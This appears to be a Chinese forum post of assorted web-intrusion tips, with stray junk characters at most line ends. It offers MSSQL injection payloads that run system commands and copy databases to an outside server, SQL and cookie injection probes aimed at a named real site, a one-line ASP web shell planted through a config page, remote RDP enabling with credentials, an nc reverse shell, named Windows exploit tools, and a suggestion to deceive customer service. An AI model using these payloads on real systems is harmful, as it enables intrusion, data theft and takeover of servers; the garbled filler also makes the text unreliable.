SA点数据库分离技术相关: L. S$ j" m/ q" M, {
- }, D4 n$ C& P
& E1 p. |: H( n7 v+ o7 S/ }% H
SA点数据库分离搞法+语句:. R0 P" c3 s, C/ t: q: M z
! O0 w3 i2 z2 S4 U' i, `
注射点不显错,执行下面三条语句页面都返回正常。
& i9 x2 O1 H0 p3 \and 1=(select count(*) FROM master.dbo.sysobjects where name= 'xp_regread'). z) A \; O, W; e$ b
and 1=(select count(*) FROM master.dbo.sysobjects where name= 'sp_makewebtask')
" F; {0 c. N' W# S: }and 1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')- h% o3 ]$ e4 [+ d: ?+ W: k" r% r
可以列目录,判断系统为2000,web与数据库分离- y. o# N3 x3 [! g9 _* G
遇到这种情况首先要想办法得到数据库IP来进行下一步得渗透了。. Z0 Q$ t: {6 a8 k2 O5 P% g9 {
在注射点上执行% B0 x0 A0 `) [4 R8 Q3 V
declare @shell int exec sp_oacreate 'wscript.shell',@shell output exec sp_oamethod @shell,'run',null,'c:\winnt\system32\cmd /c net user ';--9 c( r# y/ _# } _" O) P9 @
页面返回正常,通过上面这个命令执行telnet我一个外网肉鸡得1433端口,然后netstat/an没有得到IP: Q9 q2 T+ k: N* ~! Y# Q3 ]
还有我用NC监听得其他端口都没有得到IP。
! e/ y F$ C! b3 K+ r8 r3 G# X4 U H c% K7 B
通过注射点执行下面这两个命令页面都返回异常,在肉鸡上面同样也是没有得到IP。
5 U" d0 E1 M! }$ }! D'insert into opendatasource('sqloledb','server=xxx.xxx.xxx.xxx;uid=sasa;pwd=sasa;database=tempdb').tempdb.dbo.temp select name from master.dbo.sysdatabases--
. Y6 C: I5 j& l
" P4 ~/ G' B; y; h;insert into OPENROWSET('SQLOLEDB','uid=sa;pwd=pass;Network=DBMSSOCN;Address=xxx.xxx.xxx.xxx,1433;', 'select * from dest_table') select * from src_table;--1 K5 f( i. P& N! N4 ~6 i( y
: G* {4 _& Y" C& Y( n( h
现在就猜想是不是数据库是内网而且不能连外网。
) J8 A0 H) M1 B' A- k$ D6 a& t8 l
: N) E" Y/ f7 W \- Z+ {4 v
4 T4 W6 {! r7 b: s( W8 e/ taccess导出txt文本代码4 f4 S, l2 o# Y. b9 Q, U! w* ]2 S
SELECT * into [test.txt] in 'd:\web\' 'text;' from admin5 K; o. A6 Z2 a: l1 C6 D
- ]! y8 g. z5 |. v! o1 S0 ?2 Z! H7 c3 I
& ~3 K/ O% k8 h1 _6 h( q
自动跳转到指定网站代码头. h+ l9 C2 k, E$ t
<body onload='vbscript:document.links(0).href="http://www.google.com":document.links(0).innerHTML="www.sohu.com"'>% _; v( p( P) T" b
6 }2 E% F! G. q4 e8 Q; b. {' M( C+ d, N5 W
入侵java or jsp站点时默认配置文件路径:
* A0 L: L: _3 N: {- n\web-inf\web.xml9 x( k- N# y1 V1 d, ] k
tomcat下的配置文件位置:$ ]. Z- l. b9 T& p; c' C# |4 m2 P
\conf\server.xml (前面加上tomcat路径)
4 M) {. O4 G4 c+ e\Tomcat 5.0\webapps\root\web-inf\struts-config.xml
/ M7 I0 H+ d1 `1 a3 W! A6 F, n$ z3 _+ l+ Q# m' j9 P
. Y& |0 I% N/ z
" A: u; J4 w: N* e: F- e
检测注入点新方法运算符法,在过滤了and or cookies时用比有效果:
2 o5 L% M% ~% Z- O: r+ J-1%23/ _0 q; w r2 `
> 6 q2 i+ `9 @" e" j0 z
<: W* ^8 v& ]. g* P& J3 s( Z
1'+or+'1'='1" J7 B6 U0 E) z- F+ Z9 A/ `$ b
id=8%bf }; n) z% |& x' |# O
7 c! p8 U) `" W4 L* v" i! a全新注入点检测试法:
; Y* D! z8 N$ G9 l8 Y在URL地址后面加上-1,URL变成:http://gzkb.goomoo.cn/news.asp?id=123-1,如果返回的页面和前面不同,是另一则新闻,则表示有注入漏洞,是数字型的注入漏洞;在 URL地址后面加上 -0,URL变成 http://gzkb.goomoo.cn/news.asp?id=123-0,返回的页面和前面的页面相同,加上-1,返回错误页面,则也表示存在注入漏洞,是数字型的。
* {( D7 @) C5 W
$ Y3 k' ?" c& X% V6 R0 O- U5 A在URL的地址后面加上'%2B',URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2B',返回的页面和1同;加上'2%2B'asdf,URL地址变为:http://gzkb.goomoo.cn/news.asp?id=123'%2Basdf,返回的页面和1不同,或者说未发现该条记录,或者错误,则表示存在注入点,是文本型的。4 v' F4 Y, o O7 V0 z2 l( ^
! p$ r$ D3 W n8 v( C8 R
搜索型注入判断方法:
( h& p4 o$ t* `+ N, Q6 ` H北京%' and '1'='1' and '%'='
% D1 X. W6 F! J* b3 R北京%' and '1'='2' and '%'='
: X- y5 [( q/ J' \
* x( x9 N6 \; D/ {# Q1 A, n4 J. p$ \ E7 h# P, h8 w& a" s! f+ r
COOKIES注入:7 m& U3 I9 |% I8 `3 `% Q9 N: q
9 L5 O+ r& h& pjavascript:alert(document.cookie="id="+escape("51 and 1=1"));
5 I7 P7 C9 j1 [5 U7 E6 @/ X" \8 R( d0 ^; `) w% f" Z
2000专业版查看本地登录用户命令:3 `4 H) q3 O l2 }
net config workstation1 @, L& i) p# |$ T+ A
9 S y$ J1 g/ N9 I/ t: @" n5 [( y- Z3 b7 D# Z( W5 q
2003下查看ipsec配置和默认防火墙配置命令:% k2 z$ I$ A; o8 X) z& D
netsh firewall show config
) L; t$ x' H+ m( anetsh ipsec static show all# ^% Q) Z8 `. R- z* w; ?5 i( S, \
7 q# S# h# ^6 g D不指派指定策略命令:7 _2 t+ x7 v: P
netsh ipsec static set policy name=test assign=n (test是不指派的策略名)
I5 @: g# G! L I" x( \netsh ipsec static show policy all 显示策略名
, ` t. Q. u5 ]% x# K
: F8 p6 p; g+ P( ~
j# O% T& M+ J: `% ^猜管理员后台小技巧:/ C6 S7 F& m# L, @+ t
admin/left.asp
7 H& a3 Q' @4 yadmin/main.asp" e8 P- j- b1 R
admin/top.asp
& u( l) G/ k7 a: d1 t- tadmin/admin.asp 4 W6 C: h7 L8 [, ^
会现出菜单导航,然后迅雷下载全部链接* W5 q5 ^$ U" C; _& O
* u6 i& H4 n; \1 k0 j4 j
8 ^5 r: g0 O: [* [3 u8 O% c$ T# O
社会工程学:
3 l$ c5 U7 F0 b/ @1 ]2 y& @用这个查信息 http://tool.chinaz.com/ Whois查域名注册人和维护人
- i0 ?% O% F1 U3 G然后去骗客服
% e2 g+ \* F2 V8 D1 N
& ]8 L' D* I( R8 I
9 R3 F0 Q+ h- S; t( r9 v% _统计系统使用的是IT学习者的统计系统,在网上下载了一套回来研究。这样的系统拿webshell一般就二种:1.数据库插一句话木马,客户端连接得到。2.网站配置页面写入木马代码拿webshell。打开数据库目录,发现数据库扩展名是asp的,默认路径:data/#ITlearner.asp,把数据库扩展名改成*.mdb,用明小子的数据库工具打开,发现有防下载的表。管理员的默认密码是:ITlearner。数据库插一句话木马这条路是走不通了,现在只有看第二种方法看行不。输入默认密码进入 http://www.cnc-XX.com/admin/cutecounter /admin.asp?action=ShowConfig,查看原代码: 4 H9 b( R1 F3 A/ L- n, k
查找 修改maxlength="3"为maxlength="100">这里是为了突破固定长度的字符输入。然后查找 处 修改为action="http://www.cnc-XX.com/admin/cutecounter/admin?Action=SaveConfig">,
( x' X) ?/ \" M- j! z& I Z5 ] 存为html文件打开后在最后详细来访信息记录多少条记录,默认为100条框输入100:eval request(chr(35)),点击保存。提示无法找到,结果发现。
$ G* o' F3 m2 b: `1 y, W' B% m2 i" f5 y. I3 I( p
2 h* U2 K# H- A8 ?9 [
0 Z; i, M7 W% |) w, O$ i6. 554端口 用real554.exe入侵。 6129端口 用dameware6129.exe入侵。 系统漏洞 利用135、445端口,用ms03026、ms03039、ms03049、ms04011漏洞, 进行溢出入侵。 3127等端口 可以利用doom病毒开的端口,用nodoom.exe入侵。(可用mydoomscan.exe查), J# l9 H9 ^: G* S$ k& o
1 ?, V0 v* ]/ J0 x( M) @
3 A9 }) m: R3 }
% J3 T! X1 X# P
CMD加密注册表位置
3 o# B$ C4 @# J) b7 d! M. a(1)HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Command Processor
( ^% k2 D9 R3 o+ S& ]& i; l! E" ZAutoRun
- M0 e, G3 I$ u5 V$ L/ z* r1 G. A
5 h9 [& T2 t0 t. n# }" [(2)HKEY_CURRENT_USER\Software\Microsoft\Command Processor
: U% [! F! [" u3 e' P+ u* T# ~AutoRun# J2 Q* \: Z. S. L/ l" s
: L% I; g5 q2 M8 h7 V
, T T* H1 W* t3 s! C: o# \6 K* L& F* [在找注入时搜索Hidden,把他改成test
# g/ R; k" M' w! t4 V/ \9 C5 a+ o) d" f' b; u8 c5 k
F4 U: Z% }+ ]8 _4 \0 q8 W/ S* Z8 C7 Q, ?( |/ h
mstsc /v:IP /console - o/ C1 G1 Z: s) p B: w: a
( g' E/ ^9 J6 `+ N# @- a) Y
+ U+ G% l- n4 O4 L
一句话开3389:0 z$ n6 ?* W+ g3 d X2 M
" M# H- M* D, ] T最近我在网上看到新出了一种方法,一句话开3389,不过好像听说只能用于2003系统,唉,还是写出来和大家分享一下吧.很简单的,wmic RDTOGGLE WHERE ServerName='%COMPUTERNAME%' call SetAllowTSConnections 1 adh=Kp e!w 8 kw`=wSH>
+ z4 T( [8 r \& v9 v* H6 [开远程:WMIC /node:"远程机器名" /user:"administrator" /password:"lcx" RDTOGGLE WHERE ServerName='远程机器名' call SetAllowTSConnections 1 就是这样了,其实还有其他的一些方法开2003的3389,我这里也不多作介绍了,大家有空上网一查就知道了.
$ J& Y- o, Y1 j1 }2 f: q# f
9 T( ]+ t/ a- b$ @2 s! t6 @2 ?* J' R& \" }
知道表名,字段,使用SQL语句在ACCESS数据库中加个用户名及密码语句如下:
" |! }) }7 h% O1 F) e- zInsert into admin(user,pwd) values('test','test')
: Q* [$ |: @. t: z, p( u/ H/ b( m. {2 W9 I% w
' r: }2 C; h: o. Y" |3 w& b7 ~! VNC反弹
. ~- C4 r" `1 W3 p$ q/ ]先在本机执行: nc -vv -lp 监听的端口 (自己执行)
: o/ {2 c" k, S. s然后在服务器上执行: nc -e cmd.exe 自己的IP 和监听的端口 (对方执行)
% E- c0 k( l; C7 b* ]1 Y9 y$ R+ o; Y5 l0 P
6 R& a y2 `5 m9 T6 j+ y0 q
在脚本入侵过程中要经常常试用%00来确认下参数是否有问题
2 V- i3 Z+ B" I" Y" Y! A8 E3 J5 u# a
有时候我们入侵的时候,在webshell没有办法列举网站的目录包括dir也不行的时候,这个时候可以尝试用DOS命令SUBST转移目录
( M2 D. g5 u6 N例如:
2 a( m6 \4 @4 n# F" ysubst k: d:\www\ 用d盘www目录替代k盘2 w0 A- E+ R% i* J
subst k: /d 解除K盘代替 |